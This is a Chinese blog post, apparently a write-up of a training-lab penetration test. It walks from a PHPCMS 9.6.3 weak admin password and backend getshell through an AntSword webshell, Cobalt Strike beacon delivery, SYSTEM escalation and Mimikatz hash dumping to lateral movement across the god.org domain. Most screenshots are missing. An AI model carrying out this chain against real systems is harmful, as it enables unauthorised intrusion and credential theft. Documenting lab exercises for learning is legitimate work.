当前位置:网站首页>记一次phpcms9.6.3漏洞利用getshell到内网域控
记一次phpcms9.6.3漏洞利用getshell到内网域控
2022-06-26 12:35:00 【『铁躯电芯』】
信息收集
首先利用nmap扫描网段收集到主机ip地址:
nmap -sP 192.168.31.0/24
扫描主机信息:
发现可能是win7的操作系统并且开放80端口
getshell
因为开放80端口,直接访问网站:
得到:
扫描目录发现管理员登陆:
得到:
弱口令:admin admin12345
phpcms9.6.3后台getshell的漏洞,网上有很多可以参考这篇博客:
https://blog.csdn.net/weixin_42433470/article/details/112409431
我这里利用的是:
用户->管理员模块->添加会员模型
得到shell:
获取权限
用蚁剑连接shell
然后利用cs上线:
利用的模块是:
首先创建一个监听:
利用的攻击模块是:
attack–>web DRIVE-BY -->scripted web delivery
生成:
复制到蚁剑上运行:
cs这边就上线了:
CS进行嗅探
shell systeminfo
得到:
收集到:域是god.org
存在地址:192.168.52.143
提权
得到system权限:
cs获取hash
Access–>Run Minikatz
CS查看域环境:
net view
CS获取域内主机列表:
CS获取域内主机win2008
开始得到:
执行命令:
CS获取域内主机WindowsServer2003
开始得到:
执行命令得到:
shell ipconfig 查看ip地址
边栏推荐
- Analysis report on China's photovoltaic inverter market prospect forecast and investment strategy recommendations in 2022
- webgame开发中的文件解密
- TSMC Samsung will mass produce 3nm chips in 2022: will the iPhone be the first?
- solo 博客系统的 rss 渲染失败
- sqlalchemy event listen Automatic generate CRUD excel
- power designer - 自定义注释按钮
- 洛谷P3426 [POI2005]SZA-Template 题解
- 7-3 最低通行费
- Examples of how laravel uses with preload (eager to load) and nested query
- PHP calculates excel coordinate values, starting with subscript 0
猜你喜欢
Php+laravel5.7 use Alibaba oss+ Alibaba media to process and upload image / video files
Basic principle of MOS tube and important knowledge points of single chip microcomputer
Vscode solves the problem of Chinese garbled code
Realize microservice load balancing (ribbon)
The loss of female scientists
The laravel dingo API returns a custom error message
Websocket and socket IO case practice
Research and development practice of Kwai real-time data warehouse support system
International beauty industry giants bet on China
Spark-day02-core programming-rdd
随机推荐
初探Protostuff的使用[通俗易懂]
Thinkphp5 query report: sqlstate[hy093]: invalid parameter number
Is it safe to open a securities account in general
PolarisMesh系列文章——概念系列(一)
power designer - 自定义注释按钮
Introduction to the four major FPGA manufacturers abroad
New routing file in laravel framework
Jsonarray and jsonobject of fastjson [easy to understand]
Leetcode 78. Subset and 90 Subset II
手把手带你学会Odoo OWL组件开发(7):OWL项目实战使用
做自媒体视频的各种常用工具合集奉上
Several rare but useful JS techniques
2016年四川省TI杯电子设计竞赛B题
Analysis report on the "fourteenth five year plan" and investment prospect of China's pharmaceutical equipment industry 2022-2028
Investment forecast and development strategy analysis report of China's rural sewage treatment industry in 2022
Comparison of latest mobile phone processors in 2020 (with mobile phone CPU ladder diagram)
Redis learning - 02 common data types, operation commands and expiration time
大智慧哪个开户更安全,更好点
[probability theory] conditional probability, Bayesian formula, correlation coefficient, central limit theorem, parameter estimation, hypothesis test
Scala-day03- operators and loop control